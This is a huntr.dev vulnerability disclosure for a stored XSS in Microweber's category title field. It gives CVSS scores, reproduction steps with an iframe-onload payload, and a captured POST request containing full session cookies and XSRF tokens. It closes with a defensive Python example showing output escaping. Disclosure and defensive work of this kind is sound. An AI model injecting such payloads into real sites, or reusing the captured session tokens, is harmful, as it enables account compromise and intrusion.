huntr | ahkecha | 13DD2F4D-0C7F-483E-A771-E1ED2FF1C36F
History: Aug 07, 2022 - 1:28 p.m.

Stored XSS on Categories

2022-08-07 13:28:46 | ahkecha | www.huntr.dev

5.4 Medium (CVSS3)
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: REQUIRED
Scope: CHANGED
Confidentiality Impact: LOW
Integrity Impact: LOW
Availability Impact: NONE
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

4.9 Medium (CVSS2)
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: SINGLE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: NONE
Vector: AV:N/AC:M/Au:S/C:P/I:P/A:N

EPSS: 0.001 Low
Percentile: 17.9%

Description

The title parameter in the body of the POST request sent when creating or editing a category is not sanitized or escaped, so it is vulnerable to stored XSS: the payload is saved with the category and executes for every user who later views it.

Proof of Concept

1 - Go to https://demo.microweber.org/demo/admin/view:content/action:categories

2 - Create a category or edit an existing one.

3 - Set the title to an XSS payload: "><iframe onload=prompt(1)>

4 - Save it. When an admin views the categories page or the shop, or when any user visits the public website, the stored payload executes and the prompt appears.

Screenshots and Video PoC

https://drive.google.com/drive/folders/155GUYDLkFpgezR8LiaI3rl4Ej57aDoKq?usp=sharing

POST Request (headers and body as captured)

POST /demo/api/category/1 HTTP/1.1
Host: demo.microweber.org
Cookie: XSRF-TOKEN=eyJpdiI6IlJ1SDdTaU1pTENXbnFHRStHL3NQMlE9PSIsInZhbHVlIjoiT2Q3bUZDV0dmZzVXSk8xOVVTWW1PcEFURDl2bW9BN0FUNHRKWUFxYnpLUUlWTlZCelRVWGp5anl1Z29GRmNzMnpxcEJCcU1aNzdTMWpGbE8weEFlMDF3UUthTmRHaVlxNDVraUxwTHk4Uk4wK2twbWp5OW9lQ1ZscUVobG01Q1MiLCJtYWMiOiJhYjkwMTc0ZjY5NDcxODVjMTIyNjJjOGIyYTM1MmE3N2Y1YjIyMGZhMzFlYTgwNjgxMjkyZDkzZDg0Y2IyNGVlIiwidGFnIjoiIn0%3D; _ga=GA1.2.1359565319.1659876932; _gid=GA1.2.1567963331.1659876932; laravel_session=42b3afHcNXtB19Y9WXCTYwCrkC5rdAzi7VTQLPQO; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; twk_uuid_599594841b1bed47ceb0520f=%7B%22uuid%22%3A%221.4glA0q3vlKWq3BfdxhMkPX4cwzUwXXo76pb7kSGBL4d01XmOfGrB5YUtfJiyyjGf3YtQ6HwVYvpP2MFZv1Y2QXpWjDE2AlDvkxDrT0tRsmrXgc3eNutuKPNKkVG9btJEhtmKHMjNDxMVUPhAM1k%22%2C%22version%22%3A3%2C%22domain%22%3A%22microweber.org%22%2C%22ts%22%3A1659876933445%7D; back_to_admin=https%3A//demo.microweber.org/demo/admin/category/1/edit
Content-Length: 348
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Accept: application/json, text/javascript, */*; q=0.01
X-Xsrf-Token: eyJpdiI6IlJ1SDdTaU1pTENXbnFHRStHL3NQMlE9PSIsInZhbHVlIjoiT2Q3bUZDV0dmZzVXSk8xOVVTWW1PcEFURDl2bW9BN0FUNHRKWUFxYnpLUUlWTlZCelRVWGp5anl1Z29GRmNzMnpxcEJCcU1aNzdTMWpGbE8weEFlMDF3UUthTmRHaVlxNDVraUxwTHk4Uk4wK2twbWp5OW9lQ1ZscUVobG01Q1MiLCJtYWMiOiJhYjkwMTc0ZjY5NDcxODVjMTIyNjJjOGIyYTM1MmE3N2Y1YjIyMGZhMzFlYTgwNjgxMjkyZDkzZDg0Y2IyNGVlIiwidGFnIjoiIn0=
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://demo.microweber.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.microweber.org/demo/admin/category/1/edit
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

id=1&rel_type=content&rel_id=8&data_type=category&parent_id=0&_method=PATCH&title=%22%3E%3Ciframe+onload%3Dprompt(document.domain)%3E&category-parent-selector=8&description=&position=0&thumbnail=&url=accessoaries&users_can_create_content=0&category_subtype=default&category_meta_title=&category_meta_description=&category_meta_keywords=&is_hidden=0
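The root cause is that the stored title is written into HTML without escaping on output. The following added example (not Microweber's code; the rendering functions and the shortened form body are constructed for illustration) decodes the captured request body above, shows the payload landing verbatim in a naively rendered category list, and shows the hardened form where HTML-escaping the title at output time turns the same bytes into inert text. The contains_markup helper is an extra, assumed input-side check a defender can use to log or alert on titles that carry tag delimiters; it is not a substitute for output escaping.

```python
from html import escape
from urllib.parse import parse_qs

# Constructed sample: the application/x-www-form-urlencoded body from the
# captured request, cut down to the fields that matter for this issue.
CAPTURED_BODY = (
    "id=1&rel_type=content&data_type=category&_method=PATCH"
    "&title=%22%3E%3Ciframe+onload%3Dprompt(document.domain)%3E"
    "&description=&url=accessoaries"
)


def extract_title(body: str) -> str:
    """Decode the form body the way the server does and return the submitted title."""
    fields = parse_qs(body, keep_blank_values=True)
    return fields.get("title", [""])[0]


def render_category_unsafe(title: str) -> str:
    """Vulnerable pattern (hypothetical): the stored title is concatenated straight into HTML.

    Whatever was submitted becomes part of the document, including tags and
    attribute-closing quotes, which is exactly the stored XSS described above.
    """
    return f'<li class="category">{title}</li>'


def render_category_safe(title: str) -> str:
    """Hardened pattern: escape at the point of output.

    html.escape with quote=True turns &, <, >, " and ' into entities, so the
    browser renders the payload as visible text rather than parsing it as markup.
    """
    return f'<li class="category">{escape(title, quote=True)}</li>'


def contains_markup(value: str) -> bool:
    """Defensive input-side check for logging/alerting: True when the value carries tag delimiters."""
    return "<" in value or ">" in value


if __name__ == "__main__":
    title = extract_title(CAPTURED_BODY)
    print("submitted title :", title)
    print("flagged on input:", contains_markup(title))
    print("unsafe render   :", render_category_unsafe(title))
    print("safe render     :", render_category_safe(title))
```

Escaping belongs at the output boundary because the same stored title may be rendered in several places (admin list, shop navigation, public pages), and only the template knows the context it is writing into. If the application is Laravel-based, as the laravel_session cookie in the captured request suggests, the equivalent fix in a Blade template is to render the title with the escaping `{{ $title }}` syntax rather than the raw `{!! $title !!}` syntax.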
